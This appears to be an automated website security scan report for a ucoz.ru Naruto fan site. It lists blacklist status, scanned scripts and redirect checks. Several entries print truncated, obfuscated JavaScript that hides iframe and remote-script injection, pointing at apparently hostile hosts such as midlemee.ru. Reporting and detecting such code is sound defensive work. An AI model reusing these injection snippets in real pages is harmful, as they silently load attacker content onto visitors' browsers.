Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=naruto-planett.ucoz.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://naruto-planett.ucoz.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://naruto-planett.ucoz.ru/ | 200 OK Content-Length: 83524 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var d = document; var understoodhd = d.getElementsByTagName('he' + 'ad')[0]; var overprizetag = d.createElement('ifr' + 'ame'); overprizetag.src = 'ht' + 'tp://' + vr.split('$').reverse().join('.') + '/?in=56026'; understoodhd.appendChild(overprizetag); | ||
http://userapi.com/js/api/openapi.js?48 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://gocash2.ru3.biz/js/back.php?id=54 | 200 OK Content-Length: 272 Content-Type: text/html | clean |
http://gocash2.ru3.biz/test404page.js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://s48.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s48.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s48.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://csomsk.ru/js/hint.js | 200 OK Content-Length: 3953 Content-Type: text/javascript | clean |
http://understood.looker9.ru/overprize.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://midlemee.ru/6peybjqhc7t3kh4qjwi | 200 OK Content-Length: 10128 Content-Type: text/javascript | suspicious |
Suspicious code. Script contains iFrame. document.write("");function Rqy365(src, into_element, callback, attrs) { document.write('<scr' + 'ipt type="text/javascript" src="' + src + '"></scr' + 'ipt>'); callback(); } function c575(Vjy274, G767) { var fr = ['i', 'f', 'r', 'a', 'm', 'e']; var name = fr[0] + fr[1] + fr[2] + fr[3] + fr[4] + fr[5]; var Y267 = document.createElement('div'); var FI52 = document.createElement(name); FI52.src = Vjy274; Y267.style.cssText = 'position:abs ...[3603 bytes skipped]... | ||
http://c.am11.ru/code/bn/js.php?u=20913&f=3 | 200 OK Content-Length: 266 Content-Type: text/javascript | clean |
http://midlemee.ru/7uzkku3gfmh5jv6vjfz3mc11uez0omdx | 200 OK Content-Length: 10150 Content-Type: text/javascript | suspicious |
Suspicious code. Script contains iFrame. document.write("");function E741(src, into_element, callback, attrs) { document.write('<scr' + 'ipt type="text/javascript" src="' + src + '"></scr' + 'ipt>'); callback(); } function mF952(J78, HV286) { var fr = ['i', 'f', 'r', 'a', 'm', 'e']; var name = fr[0] + fr[1] + fr[2] + fr[3] + fr[4] + fr[5]; var G867 = document.createElement('div'); var yL837 = document.createElement(name); yL837.src = J78; G867.style.cssText = 'position:absolut ...[3603 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Nov 2014 04:59:59 GMT
Server: uServ/3.2.2
Content-Length: 83524
Content-Type: text/html; charset=UTF-8
...83524 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Referer: http://www.google.com/search?q=naruto-planett.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.